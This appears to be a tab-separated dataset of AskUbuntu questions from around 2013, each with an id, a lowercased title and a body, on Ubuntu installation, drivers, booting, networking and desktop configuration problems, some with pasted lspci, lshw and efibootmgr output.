321176	no installer in iso	i have downloaded ubuntu 13.04 and installed all the needed softwares , java , browsers and customized as i required and i made a iso with remastersys software . i have used it before many times so it was easy to make out one . i burn it to a dvd and when i try booting it up , it actually boots up but there is no `` installer `` to install it . so how to install it . i tried opting `` start installer directly `` from boot menu but still it comes into desktop . i can use it like a os but how to install it on my hard drive ? ? i am attaching the log file details here to verify . help me out guys ! remastersys log file md5sum
321179	error on boot up	i installed 13.04 on my notebook and when i restarted it after the grub menu i got this error : sparse file not allowed followed by press any key to continue ... . and then it booted up . i formatted the partition to btrfs , is that the reason i am getting this error message ?
321182	why is primusrun slower than optirun ?	could someone please explain these results ? is primusrun too smart for glxspheres and simply not doing extra work ? ... : ~ $ glxspheres polygons in scene : 62464 visual id of window : 0xaf context is direct opengl renderer : mesa dri intel ( r ) ivybridge mobile 59.811274 frames/sec - 66.749382 mpixels/sec 59.577921 frames/sec - 66.488960 mpixels/sec 59.791245 frames/sec - 66.727029 mpixels/sec 59.723333 frames/sec - 66.651240 mpixels/sec ... : ~ $ optirun glxspheres polygons in scene : 62464 visual id of window : 0x21 context is direct opengl renderer : quadro k1000m/pcie/sse2 190.833067 frames/sec - 212.969703 mpixels/sec 209.895160 frames/sec - 234.242999 mpixels/sec 207.980413 frames/sec - 232.106141 mpixels/sec ... : ~ $ primusrun glxspheres polygons in scene : 62464 visual id of window : 0xaf context is direct opengl renderer : quadro k1000m/pcie/sse2 61.001631 frames/sec - 68.077820 mpixels/sec 59.677170 frames/sec - 66.599722 mpixels/sec 59.715808 frames/sec - 66.642842 mpixels/sec ubuntu 12.04 x64 , lenovo w530 w/ intel i7 @ 2.8 ghz
321187	how do i connect to ubuntu from android ?	i have a network of 3 pc 's in my house : two are desktop pc 's that are hard-wired to the router , the other being a netbook that is wireless . i also have 3 android tablets that are wireless . i want to use a tablet to connect to my ubuntu pc to perform terminal commands ( the other pc 's are windows-based , so they 're irrelevant ) . i have tried teamviewer , pocketcloud , and splashtop , but all of these require things to be installed on my local machine , and i would like to avoid that if at all possible . i have searched google for ssh , but i am not quite adept enough to figure out how to use it .
321191	gear icon is missing ?	my gear icon is missing ? how can i restore it ? i 'm using unity on raring .
321201	speed up reading/writing partition	my mysql program is on / . if i move my databases to a partition ( a separate hard-disk drive ) mounted on /tee , then reads and writes ( mysql queries ) take an exceedingly long time : many times more than the same reads and writes when the databases are on / . what can i do to improve this ? any advice would be most welcome . note that reading and writing /tee seems to be pretty quick other than in mysql : for example , /tee $ for i in { 1..100 } ; do find > > find ; done took 18 seconds . ( find |wc -l yields 15010 . ) note also that df -t yields : filesystem type 1k-blocks used available use % mounted on /dev/mapper/hcg -- linux -- 01-root ext4 124241852 117926300 0 100 % / none tmpfs 4 0 4 0 % /sys/fs/cgroup udev devtmpfs 8199904 4 8199900 1 % /dev tmpfs tmpfs 1641948 356 1641592 1 % /run none tmpfs 5120 0 5120 0 % /run/lock none tmpfs 8209724 0 8209724 0 % /run/shm none tmpfs 102400 0 102400 0 % /run/user /dev/sda1 fuseblk 2930232316 46281132 2883951184 2 % /tee /dev/sdb1 ext2 233191 160033 60717 73 % /boot obviously , i want this question to be useful to future users with a similar problem , so a general answer addressing many users ' concerns would be ideal . hence , i did n't supply many details . but i do n't know whether what i have provided is sufficient . i 'll be very glad to supply any details that i need to provide to strike the correct balance so this is both answerable and broadly applicable , if someone comments on this question advising me what those details are .
321203	how to turn a .py file into a .deb package using quickly ?	we have made a .py file that controls brightness of the screen . it has a gui with slider for controlling and runs when it is double clicked after marking it as executable . but we want to make a .deb package with it for easily distributing . is there any way to do it with quickly ? if not , then what are the other ways ? we also want to associate it with an icon . the project we are trying to debianize is here .
321208	software similar to quicken basic 2000	looking for program as close as possible to quicken basic 2000 , does n't have to be free..any ideas ? tried gnu , kys , etc , really need a close match
321214	upgrade 9.04 to laest version	currently i 'm using ubuntu 9.04 . i need to update this to a recent version 12.04 , 12.10 or 13.04 ? is this possible ? can someone point me to a instruction page to do this ?
321215	do n't have permission to access mac hd on dual boot mbp	i 've tried changing the sharing permissions in osx to allow my ubuntu 12.04 to access the mac hd , but it still says i do n't have permission to do so while on the ubuntu boot . i also tried to find out something about file headers for osx or whatever the command -id is supposed to do in command prompt but the command apparently is n't a valid command .
321217	unable to connect tplink wifi with my hp laptop	i am new to ubuntu . i am using tp-link adsl router for wireless internet connection . and hp sleek book laptop . the problem is internet works when i plug the lan cable but not form wifi . i dont see any wifi connection list on wireless network . my wifi button on keyboard color also shows wifi disabled and i it does not enable when i press that key . i research so much on the google but could n't found the solution . here are my some command logs : lspci 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 network controller : ralink corp. device 3290 01:00.1 bluetooth : ralink corp. device 3298 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5229 ( rev 01 ) krishna @ krishna : ~/downloads/wicd-1.7.2.4 $ /var/log/udev bash : /var/log/udev : permission denied krishna @ krishna : ~/downloads/wicd-1.7.2.4 $ sudo /var/log/udev sudo : /var/log/udev : command not found krishna @ krishna : ~/downloads/wicd-1.7.2.4 $ lspci 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation panther point pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 network controller : ralink corp. device 3290 01:00.1 bluetooth : ralink corp. device 3298 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5229 ( rev 01 ) rfkill list all 0 : hp-wifi : wireless lan soft blocked : no hard blocked : yes 1 : hp-bluetooth : bluetooth soft blocked : no hard blocked : yes sudo lshw -c network *-network unclaimed description : network controller product : ralink corp. vendor : ralink corp. physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory:92510000-9251ffff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 05 serial : 28:92:4a:52:3e:1f size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8105e-1.fw ip=192.168.195.10 latency=0 link=yes multicast=yes port=mii speed=100mbit/s please help me to fix this problem .
321218	partitioning hdd	i want to dual boot my laptop with ubuntu and windows 8 . i have already installed ubuntu and am trying to partition my hdd for windows but it wont allow me . i attached a picture of my current hdd setup . the sda5 option and the sda2 option wo n't let edit it . does any one know how i can do this ?
321221	issues regarding antivirus	i have ubuntu 12.04 and i am unable to install install antivirus software . help me to install the software .
321225	how do i fix booting process in ubuntu 12.04 after the windows7 removed ?	the windows7 os successfully removed , but ca n't boot in ubuntu , said the bootmgr is missing . also the hdd password is frozen .
321227	is there something special about netflix-desktop ?	when i started researching how to get netflix to work with ubuntu everything i saw pointed me to the netflix-desktop app . when i looked in to this app , it seemed to me ( a relative novice ) that it was just wine with firefox and silverlight installed . however , i tried installing firefox and silverlight in wine and netflix does not work . so is there some magic going on in netflix-desktop that i do n't understand , or maybe i 'm just missing something ? i know there are a million questions about netflix on ubuntu , but none of them seem to exlpain much . they just say `` install netflix-desktop '' which is fine , but i would like to understand a little more . thanks
321240	how can i revert ubuntu settings after gnome-shell install	i have ubuntu 13.04 32 bit . recently , i installed gnome 3 because i wanted to try something new . it looked and felt awful , so i removed it via ppa-purge . unfortunately , some of my setting were altered by gnome 3 which are mainly cosmetic but nonetheless annoying . some examples : - `` lock/switch account '' in the upper right menu does not show the beautiful unity lock screen any more but an ugly white box - the grub bootloader screen is now blue - when booting ubuntu , the standard gnome wallpaper appears before lightdm shows - window title font looks different now does someone know how i get back to a clean unity ?
321241	splash screen problems with 13.04	i am having a cosmetic issue with ubuntu 13.04 . after a fresh install the splash screen was fine and i had restart the laptop several times while attempting to install my wireless drivers . after everything was installed correctly , it was still fine . i ran software updater and needed to restart , so on next boot-up this is now what the boot screen looks like . both start up and shutdown are affected and both are shown in the video : http : //www.youtube.com/watch ? v=xn0zzc5yjfc thank you for your time !
321243	upload to localhost with ssh , locked account	i can access the files on localhost in my ftp programme , but the account is locked , so while i can see them and view localhost in my browser , i can not edit , download or upload any files . i setup ssh with the following positive results as explained on http : //www.unixtutorial.org/2009/05/ubuntu-ssh-how-to-enable-secure-shell-in-ubuntu/ before that i could n't even access localhost in my ftp programme . ssh localhost the authenticity of host 'localhost ( 127.0.0.1 ) ' ca n't be established . ecdsa key fingerprint is ce:12 : ab : b4 : e6:02:03 : de:35:82:22 : bd:63 : f5:9a : d1 . are you sure you want to continue connecting ( yes/no ) ? yes warning : permanently added 'localhost ' ( ecdsa ) to the list of known hosts . simon @ localhost 's password : welcome to ubuntu 13.04 ( gnu/linux 3.8.0-27-generic x86_64 ) * documentation : https : //help.ubuntu.com/ last login : sun jul 14 11:57:29 2013 i tried : $ scp test.bin simon @ server : /tmp which results in a timeout but ssh localhost logs me in with a password . this learning curve is amazing , i love ubuntu . if anyone has any ideas , could you indulge me and point me in the right direction please ?
321245	ubuntu server - games ?	i have a small ubuntu server at home and i wanted to try to play a graphical game on it . are there any games that can be started in command line and are played normal with keyboard ( and maybe mouse ) ? i dont mean text-only games . i mean games like shooters .
321247	wxpython offline installation on ubuntu 13.04	how can i install wxpython offline on my ubuntu 13.04 .
321248	64 bit now recommended ?	for the longest time 64 bit was not recommended , now we see that 13 has a 64 bit option and the not recommended message has been removed from the downloads page . does this mean that i can run 64 on a 64 cpu without problems , please advise .
321249	chrome/chromium login problem	i 'm using ubuntu 13.04 and i love it but there 's a little problem with browsers , i both tried chrome and chromium browsers but i cant login my google account for sync bookmarks etc . i already searched problem on google but couldnt find a solution . ps : i already tried clear cookies ( with clean browser lol ) thanks everyone
321252	is it possible to use juju without having sudo access on local machine ?	i would like to be able to use juju on a shared remote machine ( ie : nitrous.io or c9.io ) . is that possible ? and if so , how would you do it ?
321256	can i lower soundcard quality ?	this is from an artistic standpoint , not means of technological improvement . is it possible to lower the sound quality that leaves my soundcard ? to be more exact , can i make everything that leaves my computer sound like an 8kpbs mp3 through some terminal-magic in ubuntu , and hopefully with a cheap way back ? thanks .
321257	how to delete refind entries	i 'm not sure which area this post would be appropriate , but here goes . i have attempted several different linux distributions on my macbook pro retina ( 10.1 ) before settling on ubuntu 13.04 and i have noticed that some entries still remain in the refind screen on system boot . the answer on this ( how can i remove ubuntu from the uefi boot options ? ) page mentions using efi bootmgr to show my entries and then delete them , but i do n't really understand the resulting information . just so you know , i am trying to remove a manjaro entry and an ubuntu entry ( i have two on boot ) . thank you for any help in advance . sudo efibootmgr -v bootcurrent : 0080 timeout : 5 seconds bootorder : 0080 boot0080* mac os x acpi ( a0341d0,0 ) pci ( 1f,2 ) 03120a00000000000000hd ( 2,64028 , d634458,8430687d-0f85-4d7c-809b-e2b8078d1149 ) boot0081* mac os x acpi ( a0341d0,0 ) pci ( 1f,2 ) 03120a00000000000000hd ( 1,28,64000,75fae237-ad7a-42bf-8691-5f73dab765df ) file ( \efi\apple\firmware\thorutil.efi ) -.o . .-.e.e . .-.f . .e.f.i.-.a.p.p.l.e.-.p.a.y.l.o.a.d.0.-.d.a.t.a ... boot0082* acpi ( a0341d0,0 ) pci ( 1f,2 ) 03120a00000000000000hd ( 2,64028 , a7a3580,8430687d-0f85-4d7c-809b-e2b8078d1149 ) bootffff* acpi ( a0341d0,0 ) pci ( 1f,2 ) 03120a00000000000000hd ( 2,64028,10e15640,8430687d-0f85-4d7c-809b-e2b8078d1149 ) file ( \system\library\coreservices\boot.efi )
321258	delay an application at /etc/xdg/startup	for some reason when it 's started too quickly when it 's active it shows my desktop instead of overlaying on the active windows.i have guake.desktop in /etc/xdg/startup and i 'm wondering if there 's a way to delay it 's startup by a few seconds ? [ desktop entry ] name=guake terminal name [ pt ] =guake terminal name [ pt_br ] =guake terminal comment=use the command line in a quake-like terminal comment [ pt ] =utilizar a linha de comando em um terminal estilo quake comment [ pt_br ] =utilizar a linha de comando em um terminal estilo quake tryexec=guake exec=guake icon=/usr/share/pixmaps/guake/guake.png type=application categories=gnome ; gtk ; utility ; terminalemulator ; startupnotify=true x-gnome-autostart-enabled=false
321260	taking input from a file and writing to it in the same command	my encoder is a program that encodes a piece of text and prints the encoded text to the standard output . but when i do : cat file.txt | encoder > file.txt what happens is that all the text in file.txt is completely erased and there remains nothing in it . why does this happen ? is there something wrong with the command ? ( note : there is nothing wrong with encoder . it works perfectly . i can achieve what i want with cat file.txt | encoder > file2.txt )
321262	realtek r8168 rtl8111/8168 rev 3 drivers installed but still no wired connection to internet on 13.04	i 've literally tried everything to try and get the internet to work i downloaded the realtek drivers from realteks official website and i put them on a flash drive then compiled them in terminal and installed and everything appears to be successful i blacklisted the realtek 8169 which was the default kernel installed for me . i ran modprobe -r realtek it shows r8168 is running . then at the top of the screen it shows i have a wired connection and its working with the up and down arrows ( which wasnt there before ) in network manager but when i go to use the firefox browser it says use offline . and the network disconnects it appears like its disconnecting on and off flashing like its trying to connect but cant make a full connection . i tried changing the connection to dhcp , turned off ipv6 their must be something im unaware of that im not doing . this has been extremely frustrating any additional information ill be glad to provide thank you . heres some logs out of terminal lspci -v 00:00.0 host bridge : intel corporation 4 series chipset dram controller ( rev 03 ) subsystem : gigabyte technology co. , ltd ga-ep45-ds5/ga-eg45m-ds2h motherboard flags : bus master , fast devsel , latency 0 capabilities : < access denied > 00:01.0 pci bridge : intel corporation 4 series chipset pci express root port ( rev 03 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : ea000000-edffffff prefetchable memory behind bridge : 00000000d0000000-00000000dfffffff capabilities : < access denied > kernel driver in use : pcieport 00:1a.0 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 4 ( prog-if 00 [ uhci ] ) subsystem : gigabyte technology co. , ltd motherboard flags : bus master , medium devsel , latency 0 , irq 16 i/o ports at ff00 [ size=32 ] capabilities : < access denied > kernel driver in use : uhci_hcd 00:1a.1 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 5 ( prog-if 00 [ uhci ] ) subsystem : gigabyte technology co. , ltd motherboard flags : bus master , medium devsel , latency 0 , irq 21 i/o ports at fe00 [ size=32 ] capabilities : < access denied > kernel driver in use : uhci_hcd 00:1a.2 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 6 ( prog-if 00 [ uhci ] ) subsystem : gigabyte technology co. , ltd motherboard flags : bus master , medium devsel , latency 0 , irq 18 i/o ports at fd00 [ size=32 ] capabilities : < access denied > kernel driver in use : uhci_hcd 00:1a.7 usb controller : intel corporation 82801ji ( ich10 family ) usb2 ehci controller # 2 ( prog-if 20 [ ehci ] ) subsystem : gigabyte technology co. , ltd ga-ep45-ds5 motherboard flags : bus master , medium devsel , latency 0 , irq 18 memory at effff000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1b.0 audio device : intel corporation 82801ji ( ich10 family ) hd audio controller subsystem : gigabyte technology co. , ltd ga-ep45-ud3r motherboard flags : bus master , fast devsel , latency 0 , irq 45 memory at efff8000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation 82801ji ( ich10 family ) pci express root port 1 ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 00001000-00001fff memory behind bridge : e0000000-e01fffff prefetchable memory behind bridge : 00000000e0200000-00000000e03fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.4 pci bridge : intel corporation 82801ji ( ich10 family ) pci express root port 5 ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 0000d000-0000dfff memory behind bridge : efd00000-efdfffff prefetchable memory behind bridge : 00000000e0400000-00000000e05fffff capabilities : < access denied > kernel driver in use : pcieport 00:1c.5 pci bridge : intel corporation 82801ji ( ich10 family ) pci express root port 6 ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 i/o behind bridge : 0000c000-0000cfff memory behind bridge : efc00000-efcfffff prefetchable memory behind bridge : 00000000efe00000-00000000efefffff capabilities : < access denied > kernel driver in use : pcieport 00:1d.0 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 1 ( prog-if 00 [ uhci ] ) subsystem : gigabyte technology co. , ltd ga-ep45-ds5 motherboard flags : bus master , medium devsel , latency 0 , irq 23 i/o ports at fc00 [ size=32 ] capabilities : < access denied > kernel driver in use : uhci_hcd 00:1d.1 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 2 ( prog-if 00 [ uhci ] ) subsystem : gigabyte technology co. , ltd ga-ep45-ds5 motherboard flags : bus master , medium devsel , latency 0 , irq 19 i/o ports at fb00 [ size=32 ] capabilities : < access denied > kernel driver in use : uhci_hcd 00:1d.2 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 3 ( prog-if 00 [ uhci ] ) subsystem : gigabyte technology co. , ltd ga-ep45-ds5 motherboard flags : bus master , medium devsel , latency 0 , irq 18 i/o ports at fa00 [ size=32 ] capabilities : < access denied > kernel driver in use : uhci_hcd 00:1d.7 usb controller : intel corporation 82801ji ( ich10 family ) usb2 ehci controller # 1 ( prog-if 20 [ ehci ] ) subsystem : gigabyte technology co. , ltd ga-ep45-ds5 motherboard flags : bus master , medium devsel , latency 0 , irq 23 memory at efffe000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev 90 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=05 , subordinate=05 , sec-latency=32 capabilities : < access denied > 00:1f.0 isa bridge : intel corporation 82801jib ( ich10 ) lpc interface controller subsystem : gigabyte technology co. , ltd device 5001 flags : bus master , medium devsel , latency 0 capabilities : < access denied > kernel driver in use : lpc_ich 00:1f.2 ide interface : intel corporation 82801ji ( ich10 family ) 4 port sata ide controller # 1 ( prog-if 8a [ master secp prip ] ) subsystem : gigabyte technology co. , ltd device b002 flags : bus master , 66mhz , medium devsel , latency 0 , irq 19 i/o ports at 01f0 [ size=8 ] i/o ports at 03f4 [ size=1 ] i/o ports at 0170 [ size=8 ] i/o ports at 0374 [ size=1 ] i/o ports at f900 [ size=16 ] i/o ports at f800 [ size=16 ] capabilities : < access denied > kernel driver in use : ata_piix 00:1f.3 smbus : intel corporation 82801ji ( ich10 family ) smbus controller subsystem : gigabyte technology co. , ltd ga-ep45-ds5/ga-eg45m-ds2h motherboard flags : medium devsel , irq 6 memory at efffd000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at 0500 [ size=32 ] 00:1f.5 ide interface : intel corporation 82801ji ( ich10 family ) 2 port sata ide controller # 2 ( prog-if 85 [ master seco prio ] ) subsystem : gigabyte technology co. , ltd device b002 flags : bus master , 66mhz , medium devsel , latency 0 , irq 19 i/o ports at f600 [ size=8 ] i/o ports at f500 [ size=4 ] i/o ports at f400 [ size=8 ] i/o ports at f300 [ size=4 ] i/o ports at f200 [ size=16 ] i/o ports at f100 [ size=16 ] capabilities : < access denied > kernel driver in use : ata_piix 01:00.0 vga compatible controller : nvidia corporation gf114 [ geforce gtx 560 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : evga.com . corp. device 2069 flags : bus master , fast devsel , latency 0 , irq 10 memory at ea000000 ( 32-bit , non-prefetchable ) [ size=32m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=128m ] memory at dc000000 ( 64-bit , prefetchable ) [ size=64m ] i/o ports at ef00 [ size=128 ] [ virtual ] expansion rom at d8000000 [ disabled ] [ size=512k ] capabilities : < access denied > 01:00.1 audio device : nvidia corporation gf114 hdmi audio controller ( rev a1 ) subsystem : evga.com . corp. device 2069 flags : bus master , fast devsel , latency 0 , irq 17 memory at edffc000 ( 32-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 03:00.0 ide interface : jmicron technology corp. jmb368 ide controller ( prog-if 85 [ master seco prio ] ) subsystem : gigabyte technology co. , ltd device b000 flags : bus master , fast devsel , latency 0 , irq 16 i/o ports at df00 [ size=8 ] i/o ports at de00 [ size=4 ] i/o ports at dd00 [ size=8 ] i/o ports at dc00 [ size=4 ] i/o ports at db00 [ size=16 ] capabilities : < access denied > kernel driver in use : pata_jmicron 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 03 ) subsystem : gigabyte technology co. , ltd motherboard flags : bus master , fast devsel , latency 0 , irq 44 i/o ports at ce00 [ size=256 ] memory at efeff000 ( 64-bit , prefetchable ) [ size=4k ] memory at efef8000 ( 64-bit , prefetchable ) [ size=16k ] [ virtual ] expansion rom at efe00000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : r8168 ifconfig eth0 link encap : ethernet hwaddr 00:28 : c7:0a:42 : a2 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:7185 errors:0 dropped:14 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:1453858 ( 1.4 mb ) interrupt:44 base address:0xa000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:10001 errors:0 dropped:0 overruns:0 frame:0 tx packets:10001 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:814074 ( 814.0 kb ) tx bytes:814074 ( 814.0 kb ) lshw -c network *-network description : ethernet interface product : rtl8111/8168 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 03 serial : 00:28 : c7:0a:42 : a2 capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8168 driverversion=8.036.00-napi duplex=half latency=0 link=no multicast=yes port=twisted pair resources : irq:44 ioport : ce00 ( size=256 ) memory : efeff000-efefffff memory : efef8000-efefbfff memory : efe00000-efe1ffff 00:00.0 host bridge : intel corporation 4 series chipset dram controller ( rev 03 ) 00:01.0 pci bridge : intel corporation 4 series chipset pci express root port ( rev 03 ) 00:1a.0 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 4 00:1a.1 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 5 00:1a.2 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 6 00:1a.7 usb controller : intel corporation 82801ji ( ich10 family ) usb2 ehci controller # 2 00:1b.0 audio device : intel corporation 82801ji ( ich10 family ) hd audio controller 00:1c.0 pci bridge : intel corporation 82801ji ( ich10 family ) pci express root port 1 00:1c.4 pci bridge : intel corporation 82801ji ( ich10 family ) pci express root port 5 00:1c.5 pci bridge : intel corporation 82801ji ( ich10 family ) pci express root port 6 00:1d.0 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 1 00:1d.1 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 2 00:1d.2 usb controller : intel corporation 82801ji ( ich10 family ) usb uhci controller # 3 00:1d.7 usb controller : intel corporation 82801ji ( ich10 family ) usb2 ehci controller # 1 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev 90 ) 00:1f.0 isa bridge : intel corporation 82801jib ( ich10 ) lpc interface controller 00:1f.2 ide interface : intel corporation 82801ji ( ich10 family ) 4 port sata ide controller # 1 00:1f.3 smbus : intel corporation 82801ji ( ich10 family ) smbus controller 00:1f.5 ide interface : intel corporation 82801ji ( ich10 family ) 2 port sata ide controller # 2 01:00.0 vga compatible controller : nvidia corporation gf114 [ geforce gtx 560 ] ( rev a1 ) 01:00.1 audio device : nvidia corporation gf114 hdmi audio controller ( rev a1 ) 03:00.0 ide interface : jmicron technology corp. jmb368 ide controller 04:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168 pci express gigabit ethernet controller ( rev 03 ) im also willing to do a fresh install if someone can help me fix this problem ... an update : freshly installed ubuntu 13.04 64 bit edition still no internt : trying to install build essentials downloaded it from the internet onto a usb and i get dependency is not satisfiable : g++ ( > =4:4.4.3 ) when i click on the file build-essential_11.6ubuntu4_amd64.deb on the usb drive . i also have both realtek drivers on the usb device both r8168_8.035.00.orig.tar.bz2 which i got from here & r8168_8.036.00.tar.bz2 which i got from realtek copied both to the home directory extracted opened terminal running command cd /r8168-8.036.00 then ./autorun.sh i will post logs soon :
321265	can i launch game from steam at fullscreen on external monitor on laptop ?	i have recently installed steam and dota 2 on my ubuntu box . i would like to use my external monitor to get the `` full experience '' . the problem is that when i use the fullscreen option i get the game on fullscreen on my laptop screen . i have checked `` make this the primary display for the x screen '' for external display in nvidia x server settings . what else can i do to use my external monitor for fullscreen gaming ?
321266	will mir improve multiple-monitor support ?	i have two big personal issues with ubuntu nowadays . one of them is very poor multiple-monitor support compared to mac or windows . it 's a fact that i am scared every time i connect/disconnect my notebook to any customer 's screen , and i pray for it to function correctly . do you have any information if mir will improve ubuntu 's multiple-monitor support ?
321268	cryptsetup does not accept passphrase after installation	i used the xubuntu 13.04 installer and selected german keyboard layout . afterwards i checked that i want to install with encryption via luks on a lvm . there i entered my passphrase and the setup install the system . after a reboot i have to enter my passphrase , but it seems that cryptsetup my passphrase . i tried to use keys like us layout and also german keymapping but neither of them worked . some help apreciated
321272	what are these parameters in application.desktop ?	i set up a custom launcher in .local/share/applcations by copying and modifying one of the launchers in /usr/share/applications it works fine but i was wondering what the meaning of parameters are that are passed along after exec=program such as % f , % f , % c , % u ? is there a manpage or a list somewhere that explains these parameters ?
321273	why is system76 not mentioned on the ubuntu certified hardware partners page ?	why is system76 not mentioned on the ubuntu certified hardware partners website they are producing only ubuntu preinstalled and optimized computers : https : //www.system76.com/laptops/model/galu1 they even have an ubuntu-logo key instead of win key between ctrl and alt ; ) why are they not mentioned there ?
321276	libatk-bridge-2.0.so.0 shared library not found when opening gedit	also my ubuntu do n't boot anymore . i already installed the package at-spi2-atk with no avail . i think this package should install that lib on my system . i do n't know if it 's related to the boot problem , but i 'm guessing it is . os : 12.04lts edit : thank you for those who tried to help me out . i accidentally mistyped the ubuntu version . it 's actually precise pangolin version . anyway , i had it upgraded to 13.04 . i 'll still try to reproduce the issue later on though . so if anyone has a recommendation , please reopen the the question . thanks .
